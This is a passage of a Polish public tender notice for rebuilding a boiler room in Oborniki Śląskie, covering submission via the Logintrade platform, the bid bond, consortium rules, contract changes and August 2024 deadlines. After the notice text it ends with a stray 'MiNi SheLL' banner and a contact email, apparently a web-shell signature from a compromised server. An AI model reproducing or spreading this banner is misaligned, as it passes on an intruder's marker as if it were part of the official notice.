nr 7 do SWZ).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający w celu potwierdzenia zgodności ofertowych produktów z wymaganiami, cechami lub kryteriami określonymi w<br/>opisie przedmiotu zamówienia żąda złożenia wraz z ofertą przedmiotowych środków dowodowych tj. opis techniczny<br/>oferowanego kotła c.o. ze wskazaniem typu, modelu, marki oraz parametrów technicznych, w zakresie umożliwiającym<br/>ocenę spełniania wymagań Zamawiającego określonych w niniejszej SWZ. Zamawiający dopuszcza równoważne<br/>przedmiotowe środki dowodowe, jeżeli potwierdzają, że oferowane kotły spełniają określone przez zamawiającego<br/>wymagania. Zamawiający może żądać od wykonawców wyjaśnień dotyczących treści przedmiotowych środków<br/>dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Jeżeli wykonawca nie złoży przedmiotowych środków dowodowych lub przedmiotowe środki dowodowe są niekompletne,<br/>zamawiający wezwie do ich złożenia lub uzupełnienia w wyznaczonym terminie. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Złożenie oferty:<br/>a) Wykonawca składa ofertę za pośrednictwem formularza dostępnego na platformie (załącznik nr 6) Niezbędne wymagania<br/>techniczne umożliwiające pracę na platformie https://wroclaw- lasy.logintrade.net/ tj. opisane zostały w Regulaminie<br/>korzystania z platformy https://wroclaw-lasy.logintrade.net/ , stanowiącym załącznik nr 11 do SWZ oraz w Instrukcji<br/>dostępnej na platformie Logintrade .<br/>W Formularzu Oferty (Załącznik nr 6 do SWZ) Wykonawca zobowiązany jest podać adres poczty elektronicznej, na którym<br/>prowadzona będzie korespondencja związana z postępowaniem.<br/>b) Wykonawca zamierzający złożyć ofertę w niniejszym postępowaniu o udzielenie zamówienia publicznego musi<br/>zarejestrować się na platformie pod adresem: https://wroclaw-lasy.logintrade.net/<br/>c) Ofertę należy sporządzić w języku polskim. Ofertę składa się, pod rygorem nieważności, w formie elektronicznej (tj. w<br/>postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej<br/>podpisem zaufanym lub podpisem osobistym , w formatach danych określonych w rozporządzeniu Rady Ministrów z dnia 12<br/>kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany<br/>informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (tekst jedn.: Dz. U. z 2017<br/>r. poz. 2247 z późn. zm.). Zamawiający rekomenduje złożenie oferty w formacie .pdf. Sposób złożenia oferty, w tym<br/>zaszyfrowania oferty opisany został w Regulaminie korzystania z platformy Logintrade https://wroclaw-lasy.logintrade.net/<br/>(załącznik 11 do SWZ).<br/>d) Wykonawca składa ofertę wraz z pozostałymi dokumentami zgodnie z pkt 14.4. SWZ.<br/>e) Wszelkie informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu<br/>nieuczciwej konkurencji, które Wykonawca zastrzeże jako tajemnicę przedsiębiorstwa, powinny zostać złożone w osobnym<br/>pliku wraz z jednoczesnym zaznaczeniem polecenia „Załącznik stanowiący tajemnicę przedsiębiorstwa” a następnie wraz z<br/>plikami stanowiącymi jawną część skompresowane do jednego pliku archiwum (ZIP).<br/>f) Wykonawca może przed upływem terminu do składania ofert zmienić lub wycofać ofertę za pośrednictwem formularza<br/>dostępnego na platformie https://wroclaw-lasy.logintrade.net/. Sposób zmiany i wycofania oferty został opisany w<br/>Regulaminie korzystania z platformy Logintrade https://wroclaw-lasy.logintrade.net/.<br/>g ) Wykonawca po upływie terminu do składania ofert nie może skutecznie dokonać zmiany ani wycofać złożonej oferty.<br/>Sposób komunikowania się Zamawiającego z Wykonawcami (nie dotyczy składania i wycofania ofert):<br/>a) komunikacja pomiędzy Zamawiającym a Wykonawcami, w tym w szczególności składanie oświadczeń, wniosków,<br/>zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem dedykowane formularza<br/>dostępnego na platformie Logintrade https://wroclaw-lasy.logintrade.net/ oraz poczty elektronicznej. We wszelkiej<br/>korespondencji Zamawiający i Wykonawcy posługują się numerem postępowania wskazanym w SWZ.<br/>b) Zamawiający będzie również komunikować się z Wykonawcami za pomocą poczty elektronicznej, email<br/>oborniki@wroclaw.lasy.gov.pl .c) Dokumenty elektroniczne, oświadczenia lub cyfrowe odwzorowania dokumentów w postaci papierowej (elektroniczne<br/>kopie dokumentów stworzonych w postaci papierowej) składane są przez Wykonawcę za pośrednictwem poczty<br/>elektronicznej, na wskazany w lit b) adres email.<br/>Dokumenty elektroniczne, oświadczenia lub cyfrowe odwzorowania dokumentów w postaci papierowej (elektroniczne kopie<br/>dokumentów stworzonych w postaci papierowej) składane są przez Wykonawcą za pośrednictwem platformy Logintrade<br/>https://wroclaw-lasy.logintrade.net/ jako załączniki. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga wniesienia wadium w wysokości 900 zł<br/>Wadium należy wnieść przed upływem terminu składania ofert i utrzymywać nieprzerwanie do dnia upływu terminu<br/>związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 PZP.<br/>Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu,<br/>2) gwarancjach bankowych,<br/>3) gwarancjach ubezpieczeniowych,<br/>4) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn.: Dz. U. z 2020 r. poz. 299).<br/>Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego w PKO Bank Polski SA nr<br/>konta : 51 1020 5226 0000 6602 0343 3539 z dopiskiem: wadium na zabezpieczenie oferty w postępowaniu na<br/>,,Przebudowa kotłowni w budynku mieszkalnym jednorodzinnym wolnostojącym w Obornikach Śląskich”<br/>Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie zostanie zaliczone na rachunku bankowym<br/>Zamawiającego. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>Z treści wadium wnoszonego w formie: gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielonych<br/>przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji<br/>Rozwoju Przedsiębiorczości powinno wynikać bezwarunkowe, na pierwsze pisemne żądanie zgłoszone przez<br/>Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w<br/>okolicznościach określonych w art. 98 ust. 6 PZP.<br/>Wadium wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 12.2.SWZ ppkt 2)-4) należy przekazać<br/>Zamawiającemu wraz z Ofertą w oryginale w postaci elektronicznej tj. opatrzonej kwalifikowanym podpisem elektronicznymi<br/>osób upoważnionych do jego wystawienia. Wadium musi zabezpieczać ofertę przez cały okres związania ofertą. Oferta<br/>Wykonawcy, który nie wniesie wadium lub wniesie wadium w sposób nieprawidłowy, lub nie będzie utrzymywał wadium<br/>nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98<br/>ust. 2 pkt 3 PZP zostanie odrzucona z postępowania na podstawie art. 226 ust. 1 pkt 14 PZP<br/>Treść gwarancji wadialnej musi zawierać następujące elementy:<br/>1) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia (Zamawiającego), gwaranta (banku lub<br/>instytucji ubezpieczeniowej udzielających gwarancji/poręczenia) oraz wskazanie ich siedzib,<br/>2) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem – określenie przedmiotu zamówienia<br/>3) kwotę gwarancji/poręczenia,<br/>4) zobowiązanie gwaranta/poręczyciela do zapłacenia bezwarunkowo i nieodwołalnie kwoty gwarancji/poręczenia na<br/>pierwsze pisemne żądanie Zamawiającego w okolicznościach określonych w art. 98 ust. 6 PZP.<br/>Zamawiający zwraca wadium na zasadach uregulowanych w art. 98 ust. 1 - 5 PZP <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum):<br/>1) w formularzu oferty należy wskazać firmy (nazwy) wszystkich Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia;<br/>2) oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia. Osoba podpisująca ofertę musi posiadać umocowanie prawne do reprezentacji. Umocowanie musi<br/>wynikać z treści pełnomocnictwa załączonego do oferty – treść pełnomocnictwa powinna dokładnie określać zakres<br/>umocowania;<br/>3) Oświadczenia, o których mowa w art. 125 ust. 1 PZP, tj. oświadczenie o spełnieniu warunków udziału w postępowaniu<br/>oraz oświadczenie o braku podstaw do wykluczenia (wg wzoru stanowiącego załącznik nr 1 do SWZ) składa każdy z<br/>wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnienie warunków udziału w postępowaniu<br/>w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. Oświadczenia<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia, o których mowa wyżej powinny zostać złożone wraz z ofertą pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/>podpisem osobistym.<br/>4) dokumenty, o których mowa w pkt 10.3. SWZ obowiązany będzie złożyć każdy z wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia<br/>5) wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą ponosić odpowiedzialność solidarną za<br/>wykonanie umowy;<br/>6) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą spośród siebie Wykonawcę kierującego (lidera),<br/>upoważnionego do zaciągania zobowiązań, otrzymywania poleceń oraz instrukcji dla i w imieniu każdego, jak też dla<br/>wszystkich partnerów;<br/>7) Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w całości przez lidera lub od<br/>wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia łącznie lub każdego z osobna.<br/>8) Zamawiający informuje o treści przepisu art. 117 ust. 3 PZP, zgodnie z którym w odniesieniu do warunków dotyczących<br/>wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane, do realizacji których te zdolności są<br/>wymagane.<br/>Wzór stosownego oświadczenia został zawarty w Formularzu Oferty (stanowiącym Załącznik nr 6 do SWZ) i Zamawiający<br/>zaleca złożyć to oświadczenie właśnie w tym Formularzu .<br/>W przypadku Wykonawców wykonujących działalność w formie spółki cywilnej postanowienia dot. oferty Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) stosuje się odpowiednio.<br/>W przypadku gdy podmiotowe środki dowodowe, przedmiotowe środki dowodowe, inne dokumenty, lub dokumenty<br/>potwierdzające umocowanie do reprezentowania odpowiednio wykonawcy, wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia publicznego, podmiotu udostępniającego zasoby na zasadach określonych w art. 118 PZP, zostały<br/>wystawione przez upoważnione podmioty inne niż wykonawca, wykonawca wspólnie ubiegający się o udzielenie<br/>zamówienia, podmiot udostępniający zasoby lub podwykonawca, jako dokument elektroniczny, przekazuje się ten dokument<br/>Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Żaden z Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia nie może podlegać wykluczeniu z postępowania. W przypadku Wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia warunki udziału w postępowaniu określone w pkt 8.1.SWZ powinni spełniać łącznie wszyscy<br/>Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian został określony we wzorze umowy w załączniku nr 8 do SWZ.<br/>1) przedłużenie terminu wykonania Umowy, jeżeli niemożność dotrzymania pierwotnego terminu stanowi konsekwencję:<br/>a) konieczności wykonania robót zamiennych, dodatkowych lub innych robót niezbędnych do wykonania przedmiotu Umowy<br/>w szczególności ze względu na zasady wiedzy technicznej, udokumentowanych zatwierdzonym protokołem konieczności,<br/>b) przyczyn zależnych od Zamawiającego, Organów Administracji, innych osób lub podmiotów, za których działania nie<br/>odpowiada Wykonawca, w szczególności wystąpienia opóźnień w wydawaniu decyzji, zezwoleń, uzgodnień, itp., do<br/>wydania których właściwe organy są zobowiązane na mocy przepisów prawa, jeżeli opóźnienie przekroczy okres<br/>przewidziany w przepisach prawa, w którym ww. decyzje powinny zostać wydane oraz nie są następstwem okoliczności, za<br/>które wykonawca ponosi odpowiedzialność;<br/>c) siły wyższej określonej w § 21 Umowy,<br/>d) warunków atmosferycznych nie pozwalających na realizację robót, dla których określona odpowiednimi normami<br/>technologia wymaga właściwych warunków atmosferycznych,<br/>e) zmiany terminu dostawy materiałów koniecznych do wykonania przedmiotu zamówienia przez podmiot trzeci nie dłuższa<br/>niż 6 miesięcy (np. dostawcę, producenta) u którego Wykonawca dokonał Zamówienia,<br/>f) zmian spowodowanych warunkami geologicznymi, terenowymi (w szczególności przebiegiem urządzeń podziemnych,<br/>instalacji lub obiektów infrastrukturalnych), archeologicznymi, wodnymi itp., odmiennymi od przyjętych w dokumentacji<br/>projektowej, tj.: np.: wyższy poziom wody gruntowej, inny przebieg urządzenia podziemnego, podziemna komora, której nie<br/>ma w planach itp.),<br/>g)awarii niezawinionych przez Wykonawcę.<br/>W powyższych przypadkach termin wykonania Umowy może ulec odpowiedniej zmianie tj. o czas trwania przeszkody, jeżeli<br/>przy zachowaniu należytej staranności z uwzględnieniem profesjonalnego charakteru Wykonawcy nie można było uniknąć<br/>takiej zmiany oraz w przypadku kiedy Wykonawca wraz z wnioskiem o przedłużenie terminu przedłoży stosowne dokumenty<br/>potwierdzające faktyczne przesłanki przedłużenia terminu.<br/>2) ograniczenie zakresu zamówienia, gdy rezygnacja z danej części jest korzystna dla Zamawiającego lub wynika z<br/>obiektywnie uzasadnionych przesłanek (np. zmiana dokumentacji projektowej, sposób zagospodarowania terenu),<br/>3) roboty zamienne wynikające w szczególności ze sposobu zagospodarowania terenu, konieczności zmian w dokumentacji<br/>projektowej oraz w zakresie zmian materiałów i technologii na materiały i technologie spełniające parametry techniczne lub<br/>na materiały i technologie o wyższych parametrach niż określone w specyfikacji warunków zamówienia, dokumentacji technicznej i ofercie Wykonawcy, jeżeli takie zmiany w szczególności:<br/>a) zapewnią prawidłową realizację Umowy,<br/>b) obniżą koszty wykonania robót lub eksploatacji obiektów stanowiących Przedmiot Umowy,<br/>c) zapewnią optymalne parametry technicznych lub podniosą standard jakości robót i obiektów stanowiących Przedmiot<br/>Umowy,<br/>d) będą wynikały ze sposobu zagospodarowania terenu.<br/>e) będą wynikały z konieczności zmiany dokumentacji projektowej,<br/>f) przyniosą inne, wymierne korzyści dla Zamawiającego.<br/>4) roboty dodatkowe, które nie zostały określone w dokumentacji projektowej, a są konieczne dla prawidłowej realizacji<br/>przedmiotu umowy;<br/>5) obniżenie wynagrodzenia z uwagi na zmianę lub ograniczenie faktycznego zakresu realizacji Umowy w szczególności w<br/>wyniku okoliczności o których mowa w ust. 1 pkt. 2) i 3) niniejszego paragrafu, z zastrzeżeniem postanowień § 12 ust. 4<br/>niniejszej umowy,<br/>Zmiana umowy wymaga formy pisemnej pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-08-01 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem platformy Logintrade https://wroclaw-lasy.logintrade.net/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-08-01 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-08-30</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com